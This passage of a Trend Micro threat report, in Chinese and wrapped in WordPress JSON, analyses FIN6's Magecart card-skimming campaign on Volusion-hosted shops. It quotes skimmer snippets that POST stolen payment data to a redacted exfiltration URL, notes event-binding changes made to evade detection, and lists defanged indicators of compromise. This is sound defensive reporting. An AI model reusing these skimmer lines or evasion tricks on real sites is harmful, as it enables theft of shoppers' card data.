<\/td><td>\n  jQuery.ajax({type:\u201dPOST\u201d,async:0,url:\u201d[exfiltration url]\u201d,data:t,dataType:\u201dapplication\/json})\n  <\/td><\/tr><tr><td>\n  Newegg\n  <\/td><td>\n  jQuery.ajax({type:\u201dPOST\u201d,async:true,url:\u201d[exfiltration url]\u201d,data:pdati,dataType:\u201dapplication\/json})\n  <\/td><\/tr><tr><td>\n  Volusion\n  <\/td><td>\n  $.ajax({type: \u2018POST\u2019,url: \u2018[exfiltration url]\u2019,dataType: \u2018application\/x-www-form-urlencoded\u2019,data: d,complete:\n  function() { window.sessionStorage.removeItem(\u2018__utmz_opt_in_out\u2019); }})\n  <\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>\u9084\u6709\u4e00\u9ede\u883b\u6709\u8da3\u7684\u662f\uff0c\u6b64\u6b21\u653b\u64ca\u4e2d\u7684\u76dc\u5361\u7a0b\u5f0f\u78bc\u7d81\u5b9a\u4e86\u9001\u51fa\u4ed8\u6b3e\u8cc7\u8a0a\u6309\u9215\u7684\u300cmousedown\u300d\u548c\u300ctouchstart\u300d\u5169\u500b\u4e8b\u4ef6\u3002\u7136\u800c\u4e4b\u524d Group 6 \u7684\u76dc\u5361\u7a0b\u5f0f\u78bc\u7d81\u5b9a\u7684\u537b\u662f\u300cmouseup\u300d\u548c\u300ctouchend\u300d\u5169\u500b\u4e8b\u4ef6\u3002<\/p>\n\n\n\n<p>\u5118\u7ba1\u9019\u5169\u7d44\u4e8b\u4ef6\u4e0d\u540c\uff0c\u4f46\u5176\u5be6\u662f\u6210\u5c0d\u7684\u4e8b\u4ef6\uff0c\u800c\u4e14\u89f8\u767c\u76dc\u5361\u7a0b\u5f0f\u78bc\u7684\u6642\u9593\u4e5f\u5e7e\u4e4e\u76f8\u540c\u3002\u8868\u9762\u4e0a\u6b79\u5f92\u89f8\u767c\u76dc\u5361\u7a0b\u5f0f\u78bc\u7684\u6642\u9593\u9ede\u4f3c\u4e4e\u76f8\u540c\uff0c\u4f46\u65b0\u7684\u7248\u672c\u5176\u5be6\u662f\u523b\u610f\u9078\u64c7\u53e6\u5916\u5169\u500b\u5c0d\u61c9\u7684\u4e8b\u4ef6\u4f86\u907f\u958b\u7d93\u9a57\u5f0f\u5075\u6e2c\u898f\u5247\u3002<\/p>\n\n\n\n<style>\n   table {border-collapse:collapse; table-layout:fixed; width:310px;}\n   table td {border:solid 1px ; width:100px; word-wrap:break-word;}\n   <\/style>\n<table  class=\"wp-block-table table table-hover\" ><tbody><tr><td>\n  <strong>\u653b\u64ca\u76ee\u6a19<\/strong>\n  <\/td><td>\n  <strong>\u7d81\u5b9a\u4e8b\u4ef6\u7684\u8173\u672c\u7a0b\u5f0f\u78bc<\/strong>\n  <\/td><\/tr><tr><td>\n  \u82f1\u570b\u822a\u7a7a (British Airways)\n  <\/td><td>\n  .bind(\u201cmouseup touchend\u201d, function(a) {\u2026})\n  <\/td><\/tr><tr><td>\n  Newegg\n  <\/td><td>\n  .bind(\u201cmouseup touchend\u201d, function(e) {\u2026})\n  <\/td><\/tr><tr><td>\n  Volusion\n  <\/td><td>\n  .bind(\u2018mousedown touchstart\u2019, z)\n  <\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>\u986f\u7136 Magecart \u6703\u6301\u7e8c\u4e0d\u65b7\u4fee\u6b63\u53ca\u5be6\u9a57\u4e00\u4e9b\u65b0\u7684\u653b\u64ca\u65b9\u6cd5\uff0c\u4ee5\u4fbf\u8b93\u5176\u76dc\u5361\u7a0b\u5f0f\u78bc\u66f4\u80fd\u8eb2\u907f\u5075\u6e2c\u3002\u50cf\u9019\u985e\u9ad8\u968e\u99ed\u5ba2\u96c6\u5718\u96a8\u6642\u90fd\u5728\u5617\u8a66\u3001\u767c\u6398\u65b0\u7684\u624b\u6cd5\u4ee5\u8eb2\u907f\u5075\u6e2c\uff0c\u4e26\u6697\u4e2d\u6f5b\u4f0f\u5728\u53d7\u5bb3\u8005\u7684\u7cfb\u7d71\u3002<\/p>\n\n\n\n<p>\u8981\u9632\u7bc4\u9019\u985e\u5a01\u8105\uff0c\u7db2\u7ad9\u7d93\u71df\u8005\u5fc5\u9808\u5b9a\u671f\u6aa2\u67e5\u53ca<a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/security\/news\/vulnerabilities-and-exploits\/patching-problems-and-how-to-solve-them\" target=\"_blank\" rel=\"noreferrer noopener\">\u5f37\u5316\u8cc7\u5b89\u9632\u8b77<\/a>\uff0c\u4fee\u88dc\u4f3a\u670d\u5668\u4e26\u5c07\u4f3a\u670d\u5668\u9069\u7576\u9694\u96e2\uff0c\u6b64\u5916\u4e5f\u61c9\u63a1\u7528\u56b4\u683c\u7684\u8a8d\u8b49\u6a5f\u5236\uff0c\u5c24\u5176\u662f\u6703\u5132\u5b58\u548c<a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/security\/news\/online-privacy\/on-the-safe-side-building-better-data-protection-and-steering-clear-of-gdpr-violations\" target=\"_blank\" rel=\"noreferrer noopener\">\u7ba1\u7406\u654f\u611f\u8cc7\u6599<\/a>\u7684\u7db2\u7ad9\u3002IT \u8207\u8cc7\u5b89\u5718\u968a\u61c9\u8a72\u5c07\u4e00\u4e9b\u904e\u6642\u7684\u5143\u4ef6\u505c\u7528\u6216\u9650\u5236\u4f7f\u7528\uff0c\u4e26\u4e14\u7fd2\u6163\u6027\u76e3\u63a7\u7db2\u7ad9\u548c\u61c9\u7528\u7a0b\u5f0f\u662f\u5426\u6709\u4efb\u4f55\u53ef\u80fd\u5c0e\u81f4\u8cc7\u6599\u5916\u6d29\u7684\u53ef\u7591\u6d3b\u52d5\u5fb5\u5146\uff0c\u6216\u662f\u57f7\u884c\u4e86\u4e0d\u660e\u7684\u8173\u672c\uff0c\u6216\u662f\u6709\u672a\u7d93\u6388\u6b0a\u800c\u5b58\u53d6\u6216\u4fee\u6539\u7684\u60c5\u6cc1\u3002<\/p>\n\n\n\n<p>\u4e0b\u5217\u63a1\u7528<a href=\"https:\/\/www.trendmicro.tw\/business\/xgen-security.html\">\u8da8\u52e2\u79d1\u6280\u7684XGen\u5b89\u5168\u9632\u8b77\u6280\u8853<\/a>\u70ba\u57fa\u790e\u7684\u8da8\u52e2\u79d1\u6280\u89e3\u6c7a\u65b9\u6848\u7686\u80fd\u4fdd\u8b77\u4f7f\u7528\u8005\u548c\u4f01\u696d\uff0c\u6709\u6548\u6514\u622a\u60e1\u610f\u8173\u672c\u4e26\u9632\u6b62\u4f7f\u7528\u8005\u9023\u4e0a\u60e1\u610f\u7db2\u57df\uff1a<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/t.rend.tw\/?i=ODAzMw\">\u8da8\u52e2\u79d1\u6280PC-cillin<\/a><\/li><li><a href=\"https:\/\/www.trendmicro.tw\/tw\/business\/complete-software-protection\/index.html\">Smart Protection Network&#x2122;<\/a> \u53ca &nbsp;<a href=\"https:\/\/www.trendmicro.com\/zh_tw\/small-business\/all-products-for-smb.html\">Worry-Free Business Security&nbsp;<\/a><\/li><li><a href=\"https:\/\/www.trendmicro.com\/zh_tw\/business\/products\/network.html\">\u8da8\u52e2\u79d1\u6280Network Defense<\/a><\/li><li><a href=\"https:\/\/www.trendmicro.tw\/tw\/business\/cloud-data\/index.html\">Hybrid Cloud Security(\u6df7\u5408\u96f2\u9632\u8b77)<\/a> <\/li><\/ul>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/t.rend.tw\/?i=ODAzM\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com.tw\/wp-content\/uploads\/2015\/08\/Windows10Banner-540x90v5.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>\u8cc7\u5b89\u7814\u7a76\u4eba\u54e1 Marcel Afrahim \u4e5f\u91dd\u5c0d\u9019\u8d77\u6848\u4f8b\u5728&nbsp; Medium \u4e0a\u767c\u8868\u4e86\u4e00\u5247\u6587\u7ae0\u3002<\/p>\n\n\n\n<p><strong><em>\u5165\u4fb5\u6307\u6a19\u8cc7\u6599<\/em><\/strong><\/p>\n\n\n\n<style>\n   table {border-collapse:collapse; table-layout:fixed; width:310px;}\n   table td {border:solid 1px ; width:100px; word-wrap:break-word;}\n   <\/style>\n<table  class=\"wp-block-table table table-hover\" ><tbody><tr><td>\n  <strong>\u6307\u6a19<\/strong>\n  <\/td><td>\n  <strong>\u8aaa\u660e<\/strong>\n  <\/td><td>\n  <strong>\u8da8\u52e2\u79d1\u6280\u547d\u540d<\/strong>\n  <\/td><\/tr><tr><td>\n  volusion-cdn[.]com\n  <\/td><td>\n  FIN6 \u63a5\u6536\u8cc7\u6599\u7684\u4f3a\u670d\u5668\u7db2\u57df\n  <\/td><td><\/td><\/tr><tr><td>\n  https[:]\/\/volusion-cdn[.]com\/analytics\/beacon\n  <\/td><td>\n  FIN6 \u63a5\u6536\u8cc7\u6599\u7684\u7db2\u5740\n  <\/td><td><\/td><\/tr><tr><td>\n  https[:]\/\/storage[.]googleapis[.]com\/volusionapi\/resources.js\n  <\/td><td>\n  FIN6 \u4fe1\u7528\u5361\u76dc\u5361\u7a0b\u5f0f\u78bc\u7db2\u5740\n  <\/td><td><\/td><\/tr><tr><td>\n  2348433df49e73217969a45726c53441f092c4a6fce57d1d58a6cf79d3976058\n  <\/td><td>\n  FIN6 \u4fe1\u7528\u5361\u76dc\u5361\u7a0b\u5f0f\u78bc\u96dc\u6e4a\u78bc\n  <\/td><td>\n  TrojanSpy.JS.MAGECART.C\n  <\/td><\/tr><tr><td>\n  cee25c699a14a04c6e1b6e6fcd5ce7d4414c9f324b62509a7af14ae5bf749af8\n  <\/td><td>\n  FIN6 \u4fe1\u7528\u5361\u76dc\u5361\u7a0b\u5f0f\u78bc\u96dc\u6e4a\u78bc\n  <\/td><td>\n  TrojanSpy.JS.MAGECART.D\n  <\/td><\/tr><tr><td>\n  d03f18a71ce059a79840a38aad4944426f0524bbd68a7a8fb7003c82996e6533\n  &nbsp;\n  <\/td><td>\n  FIN6 \u4fe1\u7528\u5361\u76dc\u5361\u7a0b\u5f0f\u78bc\u96dc\u6e4a\u78bc\n  <\/td><td><\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>\u539f\u6587\u51fa\u8655\uff1a<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops\/\">FIN6 Compromised\nE-commerce Platform via Magecart to Inject Credit Card Skimmers Into Thousands\nof Online Shops<\/a><\/p>\n\n\n\n<p>\u4f5c\u8005\uff1a<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/author\/josephcchen\/\">Joseph C Chen (\u8a50\u9a19\u7814\u7a76\u54e1)<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u6700\u8fd1\u8da8\u52e2\u79d1\u6280\u5728 3,126 \u500b\u7db2\u8def\u5546\u5e97\u7576\u4e2d\u767c\u73fe\u4e86 Magecart (\u4ea6\u7a31 E-Skimming) \u7db2\u8def\u4fe1\u7528\u5361 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":"","_wpscppro_dont_share_socialmedia":false,"_wpscppro_custom_social_share_image":0,"_facebook_share_type":"","_twitter_share_type":"","_linkedin_share_type":"","_pinterest_share_type":"","_linkedin_share_type_page":"","_instagram_share_type":"","_medium_share_type":"","_threads_share_type":"","_google_business_share_type":"","_selected_social_profile":[],"_wpsp_enable_custom_social_template":false,"_wpsp_social_scheduling":{"enabled":false,"datetime":null,"platforms":[],"status":"template_only","dateOption":"today","timeOption":"now","customDays":"","customHours":"","customDate":"","customTime":"","schedulingType":"absolute"},"_wpsp_active_default_template":true},"categories":[4126],"tags":[573,1283,2068],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts\/62262"}],"collection":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=62262"}],"version-history":[{"count":0,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts\/62262\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=62262"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=62262"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=62262"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}